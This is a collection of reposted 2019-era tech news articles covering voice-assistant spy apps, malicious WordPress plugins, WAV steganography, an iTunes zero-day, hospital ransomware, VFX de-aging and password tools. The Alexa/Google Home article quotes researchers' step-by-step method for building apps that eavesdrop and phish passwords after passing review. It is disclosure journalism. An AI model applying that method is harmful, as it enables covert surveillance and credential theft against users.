Alexa and Google Home abused to eavesdrop and phish passwords
Amazon- and Google-approved apps turned both voice-controlled devices into “smart spies.”
By now, the privacy threats posed by Amazon Alexa and Google Home are common knowledge. Workers for both companies routinely listen to audio of users—recordings of which can be kept forever—and the sounds the devices capture can be used in criminal trials.
Now, there’s a new concern: malicious apps developed by third parties and hosted by Amazon or Google. The threat isn’t just theoretical. Whitehat hackers at Germany’s Security Research Labs developed eight apps—four Alexa “skills” and four Google Home “actions”—that all passed Amazon or Google security-vetting processes. The skills or actions posed as simple apps for checking horoscopes, with the exception of one, which masqueraded as a random-number generator. Behind the scenes, these “smart spies,” as the researchers call them, surreptitiously eavesdropped on users and phished for their passwords.
“It was always clear that those voice assistants have privacy implications—with Google and Amazon receiving your speech, and this possibly being triggered on accident sometimes,” Fabian Bräunlein, senior security consultant at SRLabs, told me. “We now show that, not only the manufacturers, but… also hackers can abuse those voice assistants to intrude on someone’s privacy.”
The malicious apps had different names and slightly different ways of working, but they all followed similar flows. A user would say a phrase such as: “Hey Alexa, ask My Lucky Horoscope to give me the horoscope for Taurus” or “OK Google, ask My Lucky Horoscope to give me the horoscope for Taurus.” The eavesdropping apps responded with the requested information while the phishing apps gave a fake error message. Then the apps gave the impression they were no longer running when they, in fact, silently waited for the next phase of the attack.
As the following two videos show, the eavesdropping apps gave the expected responses and then went silent. In one case, an app went silent because the task was completed, and, in another instance, an app went silent because the user gave the command “stop,” which Alexa uses to terminate apps. But the apps quietly logged all conversations within earshot of the device and sent a copy to a developer-designated server.
The phishing apps follow a slightly different path by responding with an error message that claims the skill or action isn’t available in that user’s country. They then go silent to give the impression the app is no longer running. After about a minute, the apps use a voice that mimics the ones used by Alexa and Google home to falsely claim a device update is available and prompts the user for a password for it to be installed.
SRLabs eventually took down all four apps demoed. More recently, the researchers developed four German-language apps that worked similarly. All eight of them passed inspection by Amazon and Google. The four newer ones were taken down only after the researchers privately reported their results to Amazon and Google. As with most skills and actions, users didn’t need to download anything. Simply saying the proper phrases into a device was enough for the apps to run.
All of the malicious apps used common building blocks to mask their malicious behaviors. The first was exploiting a flaw in both Alexa and Google Home when their text-to-speech engines received instructions to speak the character “?.” (U+D801, dot, space). The unpronounceable sequence caused both devices to remain silent even while the apps were still running. The silence gave the impression the apps had terminated, even when they remained running.
The apps used other tricks to deceive users. In the parlance of voice apps, “Hey Alexa” and “OK Google” are known as “wake” words that activate the devices; “My Lucky Horoscope” is an “invocation” phrase used to start a particular skill or action; “give me the horoscope” is an “intent” that tells the app which function to call; and “taurus” is a “slot” value that acts like a variable. After the apps received initial approval, the SRLabs developers manipulated intents such as “stop” and “start” to give them new functions that caused the apps to listen and log conversations.
Others at SRLabs who worked on the project include security researcher Luise Frerichs and Karsten Nohl, the firm’s chief scientist. In a post documenting the apps, the researchers explained how they developed the Alexa phishing skills:
. Create a seemingly innocent skill that already contains two intents:
– an intent that is started by “stop” and copies the stop intent
– an intent that is started by a certain, commonly used word and saves the following words as slot values. This intent behaves like the fallback intent.
2. After Amazon’s review, change the first intent to say goodbye, but then keep the session open and extend the eavesdrop time by adding the character sequence “(U+D801, dot, space)” multiple times to the speech prompt.
3. Change the second intent to not react at all
When the user now tries to end the skill, they hear a goodbye message, but the skill keeps running for several more seconds. If the user starts a sentence beginning with the selected word in this time, the intent will save the sentence as slot values and send them to the attacker.
To develop the Google Home eavesdropping actions:
1. Create an Action and submit it for review.
2. After review, change the main intent to end with the Bye earcon sound (by playing a recording using the Speech Synthesis Markup Language (SSML)) and set expectUserResponse to true. This sound is usually understood as signaling that a voice app has finished. After that, add several noInputPrompts consisting only of a short silence, using the SSML element or the unpronounceable Unicode character sequence “?.”
3. Create a second intent that is called whenever an actions.intent.TEXT request is received. This intent outputs a short silence and defines several silent noInputPrompts.
After outputting the requested information and playing the earcon, the Google Home device waits for approximately 9 seconds for speech input. If none is detected, the device “outputs” a short silence and waits again for user input. If no speech is detected within 3 iterations, the Action stops.
When speech input is detected, a second intent is called. This intent only consists of one silent output, again with multiple silent reprompt texts. Every time speech is detected, this Intent is called and the reprompt count is reset.
The hacker receives a full transcript of the user’s subsequent conversations, until there is at least a 30-second break of detected speech. (This can be extended by extending the silence duration, during which the eavesdropping is paused.)
In this state, the Google Home Device will also forward all commands prefixed by “OK Google” (except “stop”) to the hacker. Therefore, the hacker could also use this hack to imitate other applications, man-in-the-middle the user’s interaction with the spoofed Actions, and start believable phishing attacks.
SRLabs privately reported the results of its research to Amazon and Google. In response, both companies removed the apps and said they are changing their approval processes to prevent skills and actions from having similar capabilities in the future. In a statement, Amazon representatives provided the following statement and FAQ (emphasis added for clarity):
Customer trust is important to us, and we conduct security reviews as part of the skill certification process. We quickly blocked the skill in question and put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.
On the record Q&A:
1) Why is it possible for the skill created by the researchers to get a rough transcript of what a customer says after they said “stop” to the skill?
This is no longer possible for skills being submitted for certification. We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified.
2) Why is it possible for SR Labs to prompt skill users to install a fake security update and then ask them to enter a password?
We have put mitigations in place to prevent and detect this type of skill behavior and reject or take them down when identified. This includes preventing skills from asking customers for their Amazon passwords.
It’s also important that customers know we provide automatic security updates for our devices, and will never ask them to share their password.
Google representatives, meanwhile, wrote:
All Actions on Google are required to follow our developer policies, and we prohibit and remove any Action that violates these policies. We have review processes to detect the type of behavior described in this report, and we removed the Actions that we found from these researchers. We are putting additional mechanisms in place to prevent these issues from occurring in the future.
Google didn’t say what these additional mechanisms are. On background, a representative said company employees are conducting a review of all third-party actions available from Google, and during that time, some may be paused temporarily. Once the review is completed, actions that passed will once again become available.
It’s encouraging that Amazon and Google have removed the apps and are strengthening their review processes to prevent similar apps from becoming available. But the SRLabs’ success raises serious concerns. Google Play has a long history of hosting malicious apps that push sophisticated surveillance malware—in at least one case, researchers said, so that Egypt’s government could spy on its own citizens. Other malicious Google Play apps have stolen users’ cryptocurrency and executed secret payloads. These kinds of apps have routinely slipped through Google’s vetting process for years.
There’s little or no evidence third-party apps are actively threatening Alexa and Google Home users now, but the SRLabs research suggests that possibility is by no means farfetched. I’ve long remained convinced that the risks posed by Alexa, Google Home, and other always-listening apps outweigh their benefits. SRLabs’ Smart Spies research only adds to my belief that these devices shouldn’t be trusted by most people.
Read the original article over at ArsTechnica.com.
Fake WordPress Plugin Comes with Cryptocurrency Mining Function
Malicious plugins for WordPress websites are being used not just to maintain access on the compromised server but also to mine for cryptocurrency.
Researchers at website security company Sucuri noticed the number of malicious plugins increase over the past months. The components are clones of legitimate software, altered for nefarious purposes.
Normally, these fake plugins are used to give attackers access to the server even after the infection vector is removed. But they can include code for other purposes, too, such as encrypting content on a blog.
One of the plugins discovered by Sucuri to have a double purpose is a clone of “wpframework.” It was found in September and attackers used it to “gain and maintain unauthorized access to the site environment,” the researchers say.
It is unclear which plugin it impersonates, but one with this name exists in the WordPress public repository but its development seems to have stopped in 2011. Despite this, it still has more than 400 active installations.
Apart from scanning for functions that allow command execution at the server level and restricting this privilege to the botmaster, the plugin also carried code to run a Linux binary that mines for cryptocurrency.
When the researchers checked the referenced domain hosting the binary it was no longer active. However, the backdoor functionality of the component was still present.
The mining component was added to the Virus Total antivirus scanning platform on September 18 and is currently detected by 25 out of 56 engines.
Generating malicious plugins
Although Sucuri does not provide details about the reason for the increased frequency of malicious plugins, it is worth noting that creating them is far from being an effort.
Instead of creating a malicious WordPress plugin from scratch, attackers can modify the code of an existing one to include malicious components.
Additionally, automated tools exist that can generate a plugin with a name given by the attacker and lace it with an arbitrary payload, such as a reverse shell.
Furthermore, the web offers the necessary tutorial for low-skilled attackers to learn how to create these fake website components.
Sucuri advises webmasters to also check the additional site components when doing a malware cleanup since many times this procedure is limited to WordPress core files. Themes and plugins are often migrated without any prior scrutiny. This way, attackers maintain their grip on the new site through the backdoor planted in third-party extensions.
Read the original article over at BleepingComputer.com.
WAV audio files are now being used to hide malicious code
Steganography malware trend moving from PNG and JPG to WAV files.
Two reports published in the last few months show that malware operators are experimenting with using WAV audio files to hide malicious code.
The technique is known as steganography — the art of hiding information in plain sight, in another data medium.
In the software field, steganography — also referred to as stego — is used to describe the process of hiding files or text in another file, of a different format. For example, hiding plain text inside an image’s binary format.
Using steganography has been popular with malware operators for more than a decade. Malware authors don’t use steganography to breach or infect systems, but rather as a transfer method. Steganography allows files hiding malicious code to bypass security software that whitelists non-executable file formats (such as multimedia files).
All previous instances where malware used steganography revolved around using image file formats, such as PNG or JEPG.
The novelty in the two recently-published reports is the use of WAV audio files, not seen abused in malware operations until this year.
The two reports
The first of these two new malware campaigns abusing WAV files was reported back in June. Symantec security researchers said they spotted a Russian cyber-espionage group known as Waterbug (or Turla) using WAV files to hide and transfer malicious code from their server to already-infected victims.
The second malware campaign was spotted this month by BlackBerry Cylance. In a report published today and shared with ZDNet last week, Cylance said it saw something similar to what Symantec saw a few months before.
But while the Symantec report described a nation-state cyber-espionage operation, Cylance said they saw the WAV steganography technique being abused in a run-of-the-mill crypto-mining malware operation.
Cylance said this particular threat actor was hiding DLLs inside WAV audio files. Malware already-present on the infected host would download and read the WAV file, extract the DLL bit by bit, and then run it, installing a cryptocurrency miner application named XMRrig.
Josh Lemos, VP of Research and Intelligence at BlackBerry Cylance, told ZDNet in an email yesterday that this malware strain using WAV steganography was spotted on both Windows desktop and server instances.
The commoditization of steganography
Furthermore, Lemos also told us that this also appears to be the first time a crypto-mining malware strain was seen using abused steganography, regardless if it was a PNG, JPEG, or WAV file.
This shows that your mundane crypto-mining malware authors are growing in sophistication, as they learn from other operations.
“The use of stego techniques requires an in-depth understanding of the target file format,” Lemos told ZDNet. “It is generally used by sophisticated threat actors that want to remain undetected for a long period of time.
“Developing a stego technique takes time, and several blogs have detailed how threat actors such as OceanLotus or Turla implemented payload hiding,” Lemos added.
“These publications make it possible for other threat actors to grasp the technique and use it as they see fit.”
In other words, the act of documenting and studying steganography comes with a snowball effect that also commoditizes the technique for lower-skilled malware operations.
But while Symantec and Cylance’s work on documenting WAV-based steganography might help other malware operators, WAV, PNG, and JPG files aren’t the only file formats that can be abused.
“Stego can be used with any file format as long as the attacker adheres to the structure and constraints of the format so that any modifications performed on the targeted file do not break its integrity,” Lemos told.
In other words, defending against steganography by blocking vulnerable file formats is not the correct solution, as companies would end up blocking the downloading of many popular formats, like JPEG, PNG, BMP, WAV, GIF, WebP, TIFF, and loads more; wreaking havoc in internal networks and making it impossible to navigate the modern internet.
A proper way of dealing with steganography is… not dealing with it at all. Since stego is only used as a data transfer method, companies should be focusing on detecting the point of entry/infection of the malware that abuses stegonagraphy, or the execution of the unauthorized code spawned by the stego-laced files.
Read the original article over at ZDNet.com.
Man agrees to pay $25,000 for abusing YouTube’s takedown system
Man allegedly tried to extort payments of up to $300 with bogus takedown threats.
A Nebraska man has agreed to pay $25,000 for abusing YouTube’s takedown system under the Digital Millennium Copyright Act, YouTube said in an emailed statement Tuesday. The man, Christopher Brady, also signed a public apology admitting to “falsely claiming that material uploaded by YouTube users infringed my copyrights.”
In reality, Brady didn’t have any legitimate claim to the material, YouTube charged in an August lawsuit. YouTube said that Brady targeted at least three well-known Minecraft streamers with a series of takedown requests.
Under YouTube’s rules, a series of three takedown requests in a short period of time can lead to the loss of a YouTube account—a serious penalty for someone who has built up a large following on the platform. According to YouTube, Brady would submit two bogus takedown requests against a target’s videos. Then he would send the victim a message demanding payments—$150 in one case, $300 in another—to prevent the submission of a third request. For some reason, Brady allegedly offered victims a discount if they paid with bitcoin.
In an even more outrageous incident, Brady allegedly used the takedown process to obtain a victim’s home address—information that copyright holders are supposed to use to file copyright infringement lawsuits. Instead, YouTube believes that Brady “swatted” the target—calling law enforcement to report a fake hostage situation. The company, however, admitted it didn’t have hard evidence Brady made the swatting call.
Brady’s apology acknowledges sending “dozens” of bogus takedown requests, suggesting that he sent out many more notices than those detailed in YouTube’s August lawsuit.
“This settlement highlights the very real consequences for those that misuse our copyright system,” a YouTube spokesman told Ars. “We’ll continue our work to prevent abuse of our systems.”
Read the original article over at ArsTechnica.com.
Thousands of DOS games have been added to the Internet Archive
It’s the biggest update since games first hit the archive.
The Internet Archive has been updated with more than 2,500 DOS games, marking the most significant addition of games to the archive since 2015.
New additions include forgotten classics like Wizardry: Crusaders of the Dark Savant, Princess Maker 2, and Microsoft Adventure, a rebranding of Colossal Caves Adventure. They also include a whole lot of weird, early experiments and dead ends that should be fascinating to explore for historians, technologists, game designers, and players alike.
The blog post announcing the additions includes some disclaimers: not all games will run as speedily as one might like, not all games have manuals available (though some do), and frankly, not all games from these bygone areas are enjoyable by modern standards.
But given that many of the games from this era were distributed via floppy disks in plastic bags, preservation seems both an admirable and necessary undertaking. There’s as much value in the fact that these games are hosted somewhere safe as there is in the fact that they’re playable. As technology marches forward, it’s important to remember not to discard the old permanently just because the new is more expedient.
Many of these games were added to the Internet Archive as a result of the eXoDOS game preservation and restoration project. Internet Archive curator Jason Scott had this to say about that project:
What makes the collection more than just a pile of old, now-playable games, is how it has to take head-on the problems of software preservation and history. Having an old executable and a scanned copy of the manual represents only the first few steps. DOS has remained consistent in some ways over the last (nearly) 40 years, but a lot has changed under the hood, and programs were sometimes only written to work on very specific hardware and a very specific setup. They were released, sold some amount of copies, and then disappeared off the shelves, if not everyone’s memories.
It is all these extra steps, under the hood, of acquisition and configuration, that represents the hardest work by the eXoDOS project, and I recognize that long-time and Herculean effort. As a result, the eXoDOS project has over 7,000 titles they’ve made work dependably and consistently.
As game subscription and streaming services take hold, though, it’s worth asking how we’re going to preserve today’s games for future generations.
For more information about the project, as well as some insights into the challenges of adapting CD-ROM games for use in a browser, among other things, head to the Internet Archive and read Scott’s blog post—then play some long-forgotten games.
Read the original article over at ArsTechnica.com.
Attackers exploit an iTunes zeroday to install ransomware
Apple patches actively exploited flaw that let ransomware crooks evade AV protection.
Attackers exploited a zeroday vulnerability in Apple’s iTunes and iCloud programs to infect Windows computers with ransomware without triggering antivirus protections, researchers from Morphisec reported on Thursday. Apple patched the vulnerability earlier this week.
The vulnerability resided in the Bonjour component that both iTunes and iCloud for Windows relies on, according to a blog post. The bug is known as an unquoted service path, which as its name suggests, happens when a developer forgets to surround a file path with quotation marks. When the bug is in a trusted program—such as one digitally signed by a well-known developer like Apple—attackers can exploit the flaw to make the program execute code that AV protection might otherwise flag as suspicious.
Morphisec CTO Michael Gorelik explained it this way:
As many detection solutions are based on behavior monitoring, the chain of process execution (parent-child) plays a major role in alert fidelity. If a legitimate process signed by a known vendor executes a new malicious child process, an associated alert will have a lower confidence score than it would if the parent was not signed by a known vendor. Since Bonjour is signed and known, the adversary uses this to their advantage. Furthermore, security vendors try to minimize unnecessary conflicts with known software applications, so they will not prevent this behaviorally for fear of disrupting operations.
In August, Morphisec found attackers were exploiting the vulnerability to install ransomware called BitPaymer on the computers of an unidentified company in the automotive industry. The exploit allowed the attackers to execute a malicious file called “Program,” which presumably was already on the target’s network.
Additionally, the malicious “Program” file doesn’t come with an extension such as “.exe”. This means it is likely that AV products will not scan the file since these products tend to scan only specific file extensions to limit the performance impact on the machine. In this scenario, Bonjour was trying to run from the “Program Files” folder, but because of the unquoted path, it instead ran the BitPaymer ransomware since it was named “Program”. This is how the zero-day was able to evade detection and bypass AV.
Gorelik said that Morphisec “immediately” notified Apple of the active exploit upon finding it in August. On Monday, Apple patched the vulnerability in both iTunes 12.10.1 for Windows and iCloud for Windows 7.14. Windows users who have either application installed should ensure the automatic updates worked as they’re supposed to. In an email, Gorelik said his company has reported additional vulnerabilities that Apple has yet to patch. Apple representatives didn’t respond to an email seeking comment for this post.
What’s more, anyone who has ever installed and later uninstalled iTunes should inspect their PCs to ensure Bonjour was also removed. That’s because the iTunes uninstaller doesn’t automatically remove Bonjour.
“We were surprised by the results of an investigation that showed the Bonjour updater is installed on a large number of computers across different enterprises,” Gorelik wrote. “Many of the computers uninstalled iTunes years ago while the Bonjour component remains silently, un-updated, and still working in the background.”
An aside: Gorelik described Bonjour as “a mechanism that Apple uses to deliver future updates.” Apple and many other resources, meanwhile, say it’s a service Apple applications use to find shared music libraries and other resources on a local network. In an email, Gorelik said Bonjour serves both functions.
“Moreover in the specific attack, Bonjour was executing the SoftwareUpdate executable that is located under C:\\Program Files (x86)\\Apple Software Update\\SoftwareUpdate.exe, but instead they executed C:\\Program with the rest as parameters -> “C:\\Program ‘Files’ ‘(x86)\\Apple’ ‘Software’ ‘Update\\SoftwareUpdate.exe,'” he wrote. He went on to say that Apple developers “haven’t fixed all the vulnerabilities reported by us, only the one that was abused by the attackers.”
Read the original article over at ArsTechnica.com.
From ‘Gemini Man’ to ‘The Irishman’: Dawn of the De-Aged Actor
“It was time to try a digital human,” says Ang Lee of the steep challenge of creating a young Will Smith as ‘Gemini Man’ and Scorsese’s ‘Irishman’ push new boundaries of VFX, budgets and, say some, ethics.
While directing Will Smith in Gemini Man, in which the 51-year-old actor stars as an assassin hunted by a clone of his younger self, director Ang Lee made an unusual request of his star. He asked Smith to “act less.”
Lee needed Smith to go back to his less-polished acting roots from the early 1990s in order to capture the performance for his younger clone. But to make Smith look like his youthful self required a whole new level of trickery that saw Lee and his visual effects team create a fully digital CGI 23-year-old Will Smith.
The result: On Oct. 11, audiences will see a Fresh Prince-era Smith trade punches with his present-day self. A few weeks later, septuagenarian screen legends Robert De Niro and Al Pacino will perform together as younger men in Martin Scorsese’s gangster epic The Irishman. As visual effects technologies advance, filmmakers are rethinking the potential of digital humans, particularly as a tool for de-aging actors.
While crafting a believable synthetic human is the most difficult of VFX wizardry, Hollywood saw the possibilities a decade ago when an elderly Brad Pitt aged backward into his youthful prime in David Fincher’s The Curious Case of Benjamin Button. The work won the VFX Oscar that year, but the challenge of aging an actor up or down was still so daunting that it was rarely used outside of limited and specific story needs.
In 2019, nostalgic audiences are seeing several stars appear as their younger selves thanks to a range of VFX techniques, including Samuel L. Jackson in Captain Marvel, Robert Downey Jr. in Avengers: Endgame and Linda Hamilton in the upcoming Terminator: Dark Fate, as she returns to the franchise after 28 years (2015’s Terminator: Genisys likewise featured a de-aged Arnold Schwarzenegger).
But to de-age by creating a synthetic human is still largely uncharted territory, and top VFX artists are using various techniques that present challenges and opportunities for directors, effects artists and even the actors themselves. Upon seeing his digital younger self for the first time in The Irishman, ILM VFX supervisor Pablo Helman says De Niro told him, “You just gave me 30 more years of my career.”
Scorsese knew he needed to wield the full capacity of de-aging magic in order to make The Irishman the way he wanted: that is, with his three leads — De Niro, 75, Joe Pesci, 76, and Al Pacino, 79 — playing their characters through the decades that the story spans. But motion-capture methods of creating an onscreen digital human couldn’t be used on the three veteran actors. “Marty said to me, ‘One thing I know for sure — Bob’s an actor’s actor, Pacino and Pesci as well. They’re not going to wear a helmet with two little cameras and markers all over their faces,’ ” says Helman.
This led to a bold initiative at ILM to develop its performance-capture capabilities so that actors do not have to wear markers on set. Netflix, which made The Irishman for $159 million, and ILM say it involves a three-camera rig with a main camera and two witness cameras, as well as companion software.
“We had taken the technology away from the actor and let the director and the actors do what they need to do,” Helman explains. He adds that particularly with stars such as De Niro and Pacino, they like to act opposite each other and improvise. “That kind of interaction can’t be done in the moment when you have one actor acting against a tennis ball,” he contends. “We didn’t alter any performances. There were changes that were made to the appearance but not the choices they made in the bodies and also in the faces.” Each finished shot was then reviewed by Scorsese. “He would tell us if he felt the same way as he did when he selected the take, and if it would work for the movie.”
For Paramount’s Gemini Man, made for $138 million (plus rebates), Lee took digital human work into a whole new realm. The VFX supervisor, Bill Westenhofer, explains that as the younger and older Smith had to appear together in the same shots, other VFX techniques simply were not an option.
“I believed it was time to try a digital human,” Lee says. “You had to build the character, the detail and really study human details and the performance from our actor. I believe that’s what you have to do if that’s your lead character.”
VFX house Weta gathered images of Smith at a younger age and studied anatomy and terms such as nasolabial folds. “If anything isn’t right, it falls apart,” says Guy Williams, Weta’s VFX supervisor. “We did a deep dive into how light interacts with skin and creating pigments under the layer of skin.”
For shots in which Smith appears with his young clone, Junior, the actor performed first as Henry, with a reference actor of similar physicality playing opposite him as Junior. Then Smith performed Junior’s role on a motion-capture stage opposite a reference actor playing Henry. In scenes in which Henry and Junior are not both in the frame, the team would photograph Smith wearing a facial-capture system and then perform digital face replacement on his body. Action sequences involved fully digital doubles based on stunt performances with face replacement.
Westenhofer says that while getting the eyes right is important to overcome the uncanny valley, every element of the face and body has to be spot-on. “We had in our favor that Will is pretty healthy and still moves pretty youthfully. Making sure the youthfulness came through in the body was a consideration throughout.”
Costs can vary. At the moment, a fully digital human generally starts with the creation of a movable model of the human, explains Darren Hendler, head of VFX house Digital Domain’s digital human group. He estimates that this could cost from $500,000 to $1 million to create. Then, he adds, producers could expect to pay anywhere from $30,000 to $100,000 per shot, depending on the individual requirements of the performance in the scene. VFX pros point out that costs will drop as computers get faster and techniques evolve.
Because of the cost and complexity of creating a digital human, filmmakers often instead use so-called digital cosmetics for de-aging tasks on the actor’s actual image, such as removing wrinkles. This was seen in Marvel’s Avengers: Endgame and Captain Marvel, de-aging Downey and Jackson.
These capabilities raise important ethical questions: When is it appropriate to use an actor’s likeness, and what are an actor’s rights to his or her likeness? That conversation intensified when late actor Robin Williams’ estate put restrictions on the use of his digital likeness, an unusual move.
Westenhofer believes these are discussions that will need to happen, including how likenesses are used in Deep Fakes. “For us to do this, it took a team of several hundred artists two years to pull off. We are not close to someone going in their garage and completely fooling someone,” he says.
And then there are questions about how digital humans could impact acting opportunities — actors hired to portray younger versions of lead characters may lose out on those opportunities. Still, Westenhofer is optimistic about how digital humans could lead to new stories that maybe Hollywood hasn’t considered at this point. He says, “Our role is to show that all of these things are possible and allow incredibly talented people with these great imaginations and storytellers to come up with things that we haven’t thought of yet.”
Read the original article courtesy of HollywoodReporter.com.
7 Cybersecurity Threats That Can Sneak Up on You
From rogue USB sticks to Chrome extensions gone wild, here is a quick guide to some basic security risks you should look out for.
There’s a certain kind of security threat that catches the headlines—the massive data breach, or the malware that holds your computer to ransom—but it’s also important to keep your guard up against some of the lesser-known attacks out there too.
These threats may not have the same high-level profile as an unfixable iOS bug, but they can still do some serious damage as far as your data and privacy goes. Here’s what to look out for, and how to make sure you aren’t caught out.
Rogue USB Sticks
A small USB stick may not look very dangerous, but these portable drives can carry a major threat—particularly if they’ve been specially engineered, as some are, to start causing havoc as soon as you plug them in. You should be very, very wary of connecting a USB drive to your computer if you’re not absolutely sure where it’s from.
Even if the USB stick isn’t configured to release some kind of payload as soon as it’s attached, it can carry disguised viruses as easily as email attachments—and experiments have shown that we’re often far too curious when coming across USB sticks we don’t know the origin of, so apply some common sense.
Besides being cautious, the usual rules apply to stay safe against this sort of threat: Keep your computer operating system right up to date, make sure effective security tools are installed, and keep them up to date too. If you’re not sure about files on a USB drive, run a virus scan on them before doing anything.
In this fast-paced, hyper-connected age, it’s all too easy to forget about all the social media, language-learning, job-finding apps and sites that we’ve signed up for. But every account you leave behind gathering dust is another one that could potentially be hacked into.
As we’ve previously explained in detail, it’s important to take the time to shut down these accounts rather than just uninstalling the associated app from our phones and then forgetting all about them. If any of them should then suffer a data breach, for example, your data won’t be included.
It’s also worth running a regular audit on the third-party apps and services linked to your main accounts, like dating apps you might have hooked up to Facebook, or email apps connected to your Google account. These give hackers more targets to aim at, which is why you should regular disconnect and delete the ones you aren’t actively using.
Untrusted Browser Extensions
The right browser extensions are able to add useful functionality and features to your daily window on the web, but these add-ons need to be vetted like any other piece of software—after all, they have the privilege of being able to see everything you’re doing online, if they want to.
Pick the wrong browser extension and you could find it selling your browsing data, or harassing you with pop-up advertising, or installing extra software that you don’t actually want. We’d recommend keeping the number of browser extensions you have installed down to a minimum, and sticking only with the extensions you know and trust.
Identify safe extensions the same way you would identify safe apps: Look into the background of the developers, check the permissions that they ask for, read up on reviews left by other users, and stick to extensions that are actually useful.
Bogus Online Quizzes
You’ve probably seen friends and family take quizzes on Facebook to find out which Hogwarts house they’d get into, or which celebrity they’re most like, and so on. They may seem like harmless fun—and some are—but they can also be used to harvest personal data that you don’t really realize you’re giving away.
These quizzes can and have been used to build up more detailed profiles of people and their friends, collecting not just the answers to the quizzes themselves but also other information stored in the linked Facebook accounts. Note, too, how often these fun quizzes ask for personal data, like the first road you lived on or the name of your pets, which could be used to impersonate you in some way.
Be wary of anything that requests personal information or personal photos from you—like the recently viral FaceApp app—or that requires a connection to one of your social media accounts: Knowing which President you’re most like probably isn’t worth it.
Leaky Photo Uploads
There’s nothing wrong with posting photos to your favorite social media channels, but think twice about the information that other people can glean from any pictures you make public—particularly the places where you might live and work.
While a lot of apps, like Instagram and Facebook, automatically strip out the location data saved with photos, some, like Google Photos, can keep this data embedded in the file after it’s been shared. Plus, whether you keep the original location data with the image, an associated check-in on social media can add the location right back in.
How is this dangerous? Well, information such as knowing where you work or which road you live on can help someone run an identity theft scam, or get past security questions on your online accounts, or visit you in person when you’d rather not see them. The less your public photos say about you, the better.
Smart Home Snooping
Our homes are getting smarter, which gives hackers and malware peddlers a whole new set of devices to try and target—the end result could be doors that don’t stay locked or home security camera footage that’s viewed by more people than you’d like.
Keeping your smart home secure starts with what you buy: It’s a good idea to stick to well-known, established brands with a strong track record in hardware, as much as possible. After that, make sure both your smart home devices and your router—which acts as a gateway to them all—are kept up to date with the latest software. Most reputable smart home devices do this automatically, another good reason to stick with brands you trust.
If your smart home devices and accounts do need passwords, make sure you don’t stick with the default. Instead, pick a long and difficult-to-guess password that you aren’t using anywhere else, and turn on two-factor authentication, if available, as an extra layer of protection.
Malicious Charging Cables
The standard charging cables that come with your gadgets are designed to power them up, and perhaps sync some music when needed—but specially engineered cables that look very similar can do much more than that.
Take a look at these fake Lightning cables now capable of being mass produced, cables that look just like the genuine products but which can give hackers remote access to a device once they’re plugged in. All that the end user has to do is use a doctored cable, then agree to “trust this computer,” a common alert that’s easy to dismiss without a thought.
The fix is to only use the cables that come with your devices, or from reputable sources—something you should do anyway for the well-being of your gadgets. As with USB sticks, don’t assume any cable that you find lying around is legit.
Read the original article courtesy of Wired.com.
Ransomware forces 3 hospitals to turn away all but the most critical patients
“A criminal is limiting our ability to use our computer systems,” hospital officials warn.
Ten hospitals—three in Alabama and seven in Australia—have been hit with paralyzing ransomware attacks that are affecting their ability to take new patients, it was widely reported on Tuesday.
All three hospitals that make up the DCH Health System in Alabama were closed to new patients on Tuesday as officials there coped with an attack that paralyzed the health network’s computer system. The hospitals—DCH Regional Medical Center in Tuscaloosa, Northport Medical Center, and Fayette Medical Center—are turning away “all but the most critical new patients” at the time this post was going live. Local ambulances were being instructed to take patients to other hospitals when possible. Patients coming to DCH emergency rooms faced the possibility of being transferred to another hospital once they were stabilized.
“A criminal is limiting our ability to use our computer systems in exchange for an as-yet unknown payment,” DCH representatives wrote in a release. “Our hospitals have implemented our emergency procedures to ensure safe and efficient operations in the event technology dependent on computers is not available.”
Details about the specific strain of malware weren’t immediately available. Typically, the malware encrypts production and backup hard drives used to store data and run computer systems. Victims can only receive the decryption key needed to restore systems after paying a ransom, usually using bitcoin or another cryptocurrency. In some cases, it’s possible to decrypt data without paying the ransom. In other cases, it’s impossible.
At least seven hospitals in Australia, meanwhile, were also feeling the effects of a ransomware attack that struck on Monday. The hospitals in Gippsland and southwest Victoria said they were rescheduling some patient services as they responded to a “cyber health incident.”
“The cyber incident, which was uncovered on Monday, has blocked access to several systems by the infiltration of ransomware, including financial management,” hospital officials said. “Hospitals have isolated and disconnected a number of systems… to quarantine the infection.”
Hospital officials said they’re working with police and the Australian Cyber Security Center to manage the incident. According to news reports, hospital computer systems remained locked down at seven hospitals on Tuesday more than 24 hours after the attack struck. An official said it would take weeks to secure and restore damaged networks. The official said there was no indication that patient records had been accessed.
There was no immediate indication that the attacks in Alabama and Australia were related. One of the most memorable times hospitals were widely reported to be hamstrung by ransomware attacks was in the wake of the WannaCry ransom worm outbreak in May 2017 and, to a lesser extent, the NotPetya attack that followed two months later.
Read the original article courtesy of ArsTechnica.com.
Google’s Password Manager Now Warns About Compromised Accounts
Google’s Password Manager Checkup feature is now integrated directly into your Google Account and will warn you if your saved passwords have security issues such as weak strength or have been compromised through data breaches.
In February, Google released the Password Checkup Chrome extension that alerts you when your saved logins were found in data breaches and then prompts you to change your password.
Starting today, Google has now integrated the Password Checkup tool directly into your Google Password Manager. This means you can easily check if your passwords are secure with a click of a button in your Google Account.
To access the Password Checkup tool, you simply go to your Google Password Manager at https://passwords.google.com and click on the Check passwords link.
Google will then check your saved login credentials against the following criteria:
- Check if the credentials have been exposed in a third-party data breach.
- Check if the passwords are being reused among multiple sites.
- Whether the passwords are considered weak and can be easily brute forced by an attacker.
After performing the check, Password Checkup will display the different categories that your passwords are at risk from. These are compromised passwords, reused passwords, and weak passwords as shown below.
You can then click on the category to get a list of problematic passwords and change them to one that is more secure.
Google is not stopping there, though.
As we reported in August, Google also plans on having Google Chrome alert you if your saved passwords were found in data breaches.
While this feature is still being experimented with, it shows that Google aims to provide a free full featured password manager that can compete with many paid offerings.
Read the original article courtesy of BleepingComputer.com.